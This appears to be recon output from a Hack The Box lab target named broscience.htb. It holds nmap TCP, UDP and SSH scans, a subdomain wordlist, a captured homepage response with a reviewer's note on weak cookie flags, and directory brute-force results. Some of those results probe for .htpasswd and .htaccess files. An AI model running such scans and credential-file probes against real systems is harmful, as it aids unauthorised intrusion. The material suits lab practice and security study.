T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 28.623 days (since Wed Jan 4 02:53:31 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 93.25 ms 10.10.16.1
2 93.24 ms broscience.htb (10.10.11.195)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:13 2023 -- 1 IP address (1 host up) scanned in 34.82 seconds


@@ -0,0 +1,141 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml 10.10.11.195
Warning: 10.10.11.195 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.10.11.195 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.11.195 from 200 to 400 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.11.195 from 400 to 800 due to 11 out of 14 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of -161451 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -161451 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -186670 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -186670 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -989326 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -989326 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1019435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1019435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -578820 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -578820 microseconds. Ignoring time.
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.087s latency).
Scanned at 2023-02-01 17:49:39 CET for 293s
PORT STATE SERVICE REASON VERSION
7/udp open|filtered echo no-response
9/udp closed discard port-unreach ttl 63
17/udp closed qotd port-unreach ttl 63
19/udp open|filtered chargen no-response
49/udp open|filtered tacacs no-response
53/udp open|filtered domain no-response
67/udp open|filtered dhcps no-response
68/udp open|filtered dhcpc no-response
69/udp closed tftp port-unreach ttl 63
80/udp closed http port-unreach ttl 63
88/udp closed kerberos-sec port-unreach ttl 63
111/udp closed rpcbind port-unreach ttl 63
120/udp open|filtered cfdptkt no-response
123/udp closed ntp port-unreach ttl 63
135/udp open|filtered msrpc no-response
136/udp closed profile port-unreach ttl 63
137/udp closed netbios-ns port-unreach ttl 63
138/udp closed netbios-dgm port-unreach ttl 63
139/udp open|filtered netbios-ssn no-response
158/udp open|filtered pcmail-srv no-response
161/udp closed snmp port-unreach ttl 63
162/udp closed snmptrap port-unreach ttl 63
177/udp closed xdmcp port-unreach ttl 63
427/udp closed svrloc port-unreach ttl 63
443/udp closed https port-unreach ttl 63
445/udp open|filtered microsoft-ds no-response
497/udp open|filtered retrospect no-response
500/udp closed isakmp port-unreach ttl 63
514/udp closed syslog port-unreach ttl 63
515/udp closed printer port-unreach ttl 63
518/udp closed ntalk port-unreach ttl 63
520/udp closed route port-unreach ttl 63
593/udp closed http-rpc-epmap port-unreach ttl 63
623/udp closed asf-rmcp port-unreach ttl 63
626/udp closed serialnumberd port-unreach ttl 63
631/udp closed ipp port-unreach ttl 63
996/udp open|filtered vsinet no-response
997/udp closed maitrd port-unreach ttl 63
998/udp open|filtered puparp no-response
999/udp open|filtered applix no-response
1022/udp closed exp2 port-unreach ttl 63
1023/udp closed unknown port-unreach ttl 63
1025/udp open|filtered blackjack no-response
1026/udp closed win-rpc port-unreach ttl 63
1027/udp open|filtered unknown no-response
1028/udp closed ms-lsa port-unreach ttl 63
1029/udp closed solid-mux port-unreach ttl 63
1030/udp open|filtered iad1 no-response
1433/udp open|filtered ms-sql-s no-response
1434/udp closed ms-sql-m port-unreach ttl 63
1645/udp closed radius port-unreach ttl 63
1646/udp closed radacct port-unreach ttl 63
1701/udp closed L2TP port-unreach ttl 63
1718/udp closed h225gatedisc port-unreach ttl 63
1719/udp closed h323gatestat port-unreach ttl 63
1812/udp closed radius port-unreach ttl 63
1813/udp open|filtered radacct no-response
1900/udp open|filtered upnp no-response
2000/udp closed cisco-sccp port-unreach ttl 63
2048/udp closed dls-monitor port-unreach ttl 63
2049/udp closed nfs port-unreach ttl 63
2222/udp open|filtered msantipiracy no-response
2223/udp closed rockwell-csp2 port-unreach ttl 63
3283/udp closed netassistant port-unreach ttl 63
3456/udp closed IISrpc-or-vat port-unreach ttl 63
3703/udp closed adobeserver-3 port-unreach ttl 63
4444/udp closed krb524 port-unreach ttl 63
4500/udp open|filtered nat-t-ike no-response
5000/udp open|filtered upnp no-response
5060/udp closed sip port-unreach ttl 63
5353/udp open|filtered zeroconf no-response
5632/udp open|filtered pcanywherestat no-response
9200/udp closed wap-wsp port-unreach ttl 63
10000/udp closed ndmp port-unreach ttl 63
17185/udp open|filtered wdbrpc no-response
20031/udp closed bakbonenetvault port-unreach ttl 63
30718/udp closed unknown port-unreach ttl 63
31337/udp open|filtered BackOrifice no-response
32768/udp closed omad port-unreach ttl 63
32769/udp closed filenet-rpc port-unreach ttl 63
32771/udp open|filtered sometimes-rpc6 no-response
32815/udp closed unknown port-unreach ttl 63
33281/udp closed unknown port-unreach ttl 63
49152/udp open|filtered unknown no-response
49153/udp closed unknown port-unreach ttl 63
49154/udp closed unknown port-unreach ttl 63
49156/udp open|filtered unknown no-response
49181/udp closed unknown port-unreach ttl 63
49182/udp closed unknown port-unreach ttl 63
49185/udp closed unknown port-unreach ttl 63
49186/udp open|filtered unknown no-response
49188/udp closed unknown port-unreach ttl 63
49190/udp closed unknown port-unreach ttl 63
49191/udp closed unknown port-unreach ttl 63
49192/udp open|filtered unknown no-response
49193/udp closed unknown port-unreach ttl 63
49194/udp closed unknown port-unreach ttl 63
49200/udp open|filtered unknown no-response
49201/udp closed unknown port-unreach ttl 63
65024/udp closed unknown port-unreach ttl 63
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/1%OT=%CT=%CU=9%PV=Y%DS=2%DC=T%G=N%TM=63DA9948%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
SEQ(CI=Z)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 162/udp)
HOP RTT ADDRESS
1 31.00 ms 10.10.16.1
2 328.64 ms broscience.htb (10.10.11.195)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:54:32 2023 -- 1 IP address (1 host up) scanned in 293.59 seconds


@@ -0,0 +1,62 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.026s latency).
Scanned at 2023-02-01 17:50:14 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)
| ssh-rsa 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
| 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=
| 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN
| ssh2-enum-algos:
| kex_algorithms: (9)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (5)
| rsa-sha2-512
| rsa-sha2-256
| ssh-rsa
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
|_banner: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:16 2023 -- 1 IP address (1 host up) scanned in 2.28 seconds


@@ -0,0 +1,100 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.195" start="1675270214" startstr="Wed Feb 1 17:50:14 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="SYN Stealth Scan" time="1675270214"/>
<taskend task="SYN Stealth Scan" time="1675270214" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675270214"/>
<taskend task="Service scan" time="1675270214" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270216"/>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270216"/>
<host starttime="1675270214" endtime="1675270216"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)&#xa;ssh-rsa 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&#xa; 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=&#xa; 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN"><table>
<elem key="type">ssh-rsa</elem>
<elem key="bits">3072</elem>
<elem key="key">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</elem>
<elem key="fingerprint">df17c6bab18222d91db5ebff5d3d2cb7</elem>
</table>
<table>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="bits">256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=</elem>
<elem key="fingerprint">3f8a56f8958faeafe3ae7eb880f679d2</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="bits">256</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN</elem>
<elem key="fingerprint">3c6575274ae2ef9391374cfdd9d46341</elem>
</table>
</script><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (9)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (5)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ssh-rsa&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ssh-rsa</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="banner" output="SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1"/></port>
</ports>
<times srtt="26279" rttvar="26279" to="131395"/>
</host>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270216"/>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270216"/>
<runstats><finished time="1675270216" timestr="Wed Feb 1 17:50:16 2023" summary="Nmap done at Wed Feb 1 17:50:16 2023; 1 IP address (1 host up) scanned in 2.28 seconds" elapsed="2.28" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,124 @@
web18759
web3621
web18808
web18275
web18276
web18274
web3624
web3626
web18273
web3625
web3623
web18277
forum5
web18809
skunk
ckp
cybozu
fs7
kaori
hendry
fs8
violin
tomorrow
tonton
ate
kaizoku
physik
asean
germanium
sourabh
chiko
rc2
clown
telechargement
mhm
arch1
londres
ticket2
starsoft
ssltest2
s1018
irish
dip
www.pdf
www.idc
blacknight
aileen
advisortrac
vcr
sips
autodiscover.ns1
prashanth
autoconfig.ns1
danco
www.cyberspace
orgs
iprint
manualidades
n6
freaks
brook
hoop
pancake
corsair
kissmin
ns155
www.gamma
lifetime
omega2
farida
mojtaba
viki
messiah
www.firma
lifes
delight
sweetdona
kangdy777
dlfmaekdns
retireplan
wichitapre
catspre
altmusicpre
usmilitary
soapspre
dying
hartfordpre
emailpre
gojapanpre
christianitypre
paganwiccanpre
islampre
homevideopre
tattoopre
macsupport
southbayadmin
www.reklam
ip243
o1.send
ip241
skylark
sszang00
kudos
juese11
leebrkorea1
diybatr2427
sbgs221
avgood
ljhon00
realnut
hca-rc-013.shca
csg-saf-0029.csg
mvm-ri-d127123.roslin
hca-spglab-048.shca
www.memory
www.jjm
www.micronet
mvm-ri-d086122.roslin
www.las
ccem
b68
aszx
atto
sp2digital


@@ -0,0 +1,158 @@
HTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=514ejha3mn98hdt774ba24b3ku; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>BroScience : Home</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/uikit@3.15.0/dist/css/uikit.min.css" />
<script src="https://cdn.jsdelivr.net/npm/uikit@3.15.0/dist/js/uikit.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/uikit@3.15.0/dist/js/uikit-icons.min.js"></script> <link rel="stylesheet" href="styles/light.css">
</head>
<body class="uk-dark">
<nav class="uk-navbar-container uk-margin uk-navbar-transparent uk-dark">
<div class="uk-container uk-container-expand">
<div class="uk-navbar" uk-navbar>
<div class="uk-navbar-left">
<a href="/" class="uk-navbar-item uk-logo">BroScience</a>
</div>
<div class="uk-navbar-right">
<ul class="uk-navbar-nav"><li><a href="login.php">Log In</a></li></ul> </div>
</div>
</div>
</nav> <div class="uk-container uk-margin">
<!-- TODO: Search bar -->
<div class="uk-child-width-1-2@s uk-child-width-1-3@m" uk-grid> <div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=bench.png" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=1" class="uk-card-title">Bench Press</a>
<p>The bench press is widely regarded as the king of all exercises, specifically in building the chest ... <a href="exercise.php?id=1">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=1">administrator</a> 9 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=barbell_squats.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=2" class="uk-card-title">Barbell Squats</a>
<p>The barbell back squat is a very popular compound movement which emphasizes building the leg muscle ... <a href="exercise.php?id=2">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=2">bill</a> 1 year ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=seated_rows.png" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=3" class="uk-card-title">Seated Rows</a>
<p>If you want to target your lats, seated rows are a great exercise to do so. There are machines where... <a href="exercise.php?id=3">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=2">bill</a> 8 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=deadlift.png" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=4" class="uk-card-title">Deadlift</a>
<p>Deadlifts are another great exercise for targeting a lot of muscle groups at the same time, with the... <a href="exercise.php?id=4">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=1">administrator</a> 7 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=tricep_extensions.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=5" class="uk-card-title">Tricep Extensions</a>
<p>Tricep extensions are a great exercise to target your triceps. Requiring only a dumbell, you can do ... <a href="exercise.php?id=5">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=3">michael</a> 7 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=dumbell_curls.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=6" class="uk-card-title">Dumbell Curls</a>
<p>Curls for the girls. Arguably the favorite exercise of many gym-goers, this is a very good exercise ... <a href="exercise.php?id=6">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=4">john</a> 2 years ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=reverse_butterfly.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=7" class="uk-card-title">Reverse Butterfly</a>
<p>Reverse butterfly may be done with free weights or with a machine, although I personally prefer the ... <a href="exercise.php?id=7">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=1">administrator</a> 11 months ago</p>
</div>
</div>
</div>
<div>
<div class="uk-card uk-card-default ">
<div class="uk-card-media-top">
<img src="includes/img.php?path=shoulder_press.jpeg" width="600" height="600" alt="">
</div>
<div class="uk-card-body">
<a href="exercise.php?id=8" class="uk-card-title">Shoulder Press</a>
<p>Shoulder press, also known as the military press or overhead press, is a great way to build your sho... <a href="exercise.php?id=8">keep reading</a></p>
</div>
<div class="uk-card-footer">
<p class="uk-text-meta">Written by <a class="uk-link-text" href="user.php?id=3">michael</a> 10 months ago</p>
</div>
</div>
</div>
</div> </div>
</body>
</html>
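Review bot: The `Set-Cookie: PHPSESSID=...; path=/` header in this captured response carries no `Secure`, `HttpOnly` or `SameSite` attribute, which is worth recording as a finding next to the capture. If this response was served over HTTPS (the port 80 captures on this page only return 301 redirects), the browser may still send the session identifier over plaintext, and page script can read it. The page also loads three `cdn.jsdelivr.net` assets without an `integrity` attribute, so the site trusts whatever the CDN serves. On the PHP side the usual fix is `session.cookie_secure=1`, `session.cookie_httponly=1` and `session.cookie_samesite=Lax`.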


@@ -0,0 +1,82 @@
200 GET 29l 70w 1309c https://10.10.11.195/user.php
200 GET 1l 4w 39c https://10.10.11.195/includes/img.php
200 GET 3l 7w 44c https://10.10.11.195/styles/light.css
200 GET 42l 97w 1936c https://10.10.11.195/login.php
200 GET 28l 71w 1322c https://10.10.11.195/exercise.php
200 GET 147l 510w 0c https://10.10.11.195/
403 GET 9l 28w 278c https://10.10.11.195/.html
403 GET 9l 28w 278c https://10.10.11.195/.php
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd
403 GET 9l 28w 278c https://10.10.11.195/.htaccess
403 GET 9l 28w 278c https://10.10.11.195/.hta
403 GET 9l 28w 278c https://10.10.11.195/.hta.txt
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.txt
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.txt
403 GET 9l 28w 278c https://10.10.11.195/.hta.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.html
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.php
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.asp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.aspx
403 GET 9l 28w 278c https://10.10.11.195/.hta.aspx
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.aspx
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.jsp
403 GET 9l 28w 278c https://10.10.11.195/.hta.jsp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.jsp
200 GET 28l 66w 1256c https://10.10.11.195/activate.php
302 GET 1l 3w 13c https://10.10.11.195/comment.php => https://10.10.11.195/login.php
301 GET 9l 28w 315c https://10.10.11.195/images => https://10.10.11.195/images/
301 GET 9l 28w 317c https://10.10.11.195/includes => https://10.10.11.195/includes/
200 GET 147l 510w 0c https://10.10.11.195/index.php
301 GET 9l 28w 319c https://10.10.11.195/javascript => https://10.10.11.195/javascript/
200 GET 45l 104w 2161c https://10.10.11.195/register.php
302 GET 0l 0w 0c https://10.10.11.195/logout.php => https://10.10.11.195/index.php
301 GET 9l 28w 315c https://10.10.11.195/manual => https://10.10.11.195/manual/
403 GET 9l 28w 278c https://10.10.11.195/server-status
301 GET 9l 28w 315c https://10.10.11.195/styles => https://10.10.11.195/styles/
302 GET 1l 3w 13c https://10.10.11.195/update_user.php => https://10.10.11.195/login.php
200 GET 28l 71w 1322c https://10.10.11.195/exercise.php
200 GET 3l 7w 44c https://10.10.11.195/styles/light.css
200 GET 29l 70w 1309c https://10.10.11.195/user.php
200 GET 1l 4w 39c https://10.10.11.195/includes/img.php
200 GET 42l 97w 1936c https://10.10.11.195/login.php
200 GET 147l 510w 0c https://10.10.11.195/
403 GET 9l 28w 278c https://10.10.11.195/.html
403 GET 9l 28w 278c https://10.10.11.195/.php
403 GET 9l 28w 278c https://10.10.11.195/.hta
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd
403 GET 9l 28w 278c https://10.10.11.195/.hta.txt
403 GET 9l 28w 278c https://10.10.11.195/.htaccess
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.txt
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.txt
403 GET 9l 28w 278c https://10.10.11.195/.hta.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.html
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.php
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.asp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.aspx
403 GET 9l 28w 278c https://10.10.11.195/.hta.aspx
